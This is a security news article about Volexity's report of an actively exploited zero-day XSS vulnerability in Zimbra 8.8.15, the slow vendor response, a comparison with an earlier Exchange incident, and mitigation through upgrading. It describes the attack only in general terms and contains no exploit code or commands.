According to the security company Volexity, attackers have been exploiting a security hole in the Zimbra collaboration software since December. The manufacturer was informed in December, but has not yet delivered a patch or other protective measures.
The vulnerability is a so-called cross-site scripting problem (XSS). The attack typically works in such a way that the victim receives an email with a link. If the recipient opens this link in the browser while already logged into Zimbra in another window or tab, the disaster will follow. The attacker’s website runs script code that can access the Zimbra window because of the XSS bug.
The mail can also be opened in a real mail program such as Thunderbird; the only important thing is that the attacker’s website and a Zimbra session are active in the same browser. Typically, the attackers use this specifically to gain access to emails and their attachments. In principle, however, it would also be possible in this way to send emails in the name of the victim or to steal cookies that allow permanent access to the Zimbra account, Volexity explains in its analysis.
Parallels to the Exchange fiasco
Since December 14, Volexity has been observing highly targeted attacks via this vulnerability, which they attribute to a group called TEMP_Heretic. Volexity claims to have informed the Zimbra manufacturer about this on December 16 – including a demo exploit that illustrates the problem. Nevertheless, there is no security update or at least an advisory from Zimbra. Volexity has now published the facts.
The parallels to a critical security vulnerability in Microsoft Exchange, whose competition is Zimbra, are piquant. Here, too, Volexity had informed the manufacturer about targeted attacks via a zero-day vulnerability in December; However, Microsoft did not want to close them until patch day in March. As a result, there were mass attacks that caught most Exchange servers unprepared. Now Zimbra is not nearly as widespread as Exchange and the XSS gaps are not as serious. Nevertheless, the current situation is worrying.
If you want to protect your Zimbra server, you don’t have too many options at the moment. According to Volexity, Zimbra version 8.8.15 is affected, while the still fairly new 9.0.0 appears to be immune. So a version upgrade could put the server out of the line of fire. Furthermore, the security service provider describes the attacks in Operation EmailThief: Active Exploitation of Zero-day XSS Vulnerability in Zimbra in great detail and also provides special Indicators of Compromise, which one could use to prepare for possible attacks by TEMP_Heretic. The problem is that this information is obsolete if other attackers discover and exploit the vulnerability.
It would be better if the manufacturer developed specific protection measures and made them available in their security center. At the time of publication of the article, however, he only states that Zimbra is not affected by Log4j.
(yeah)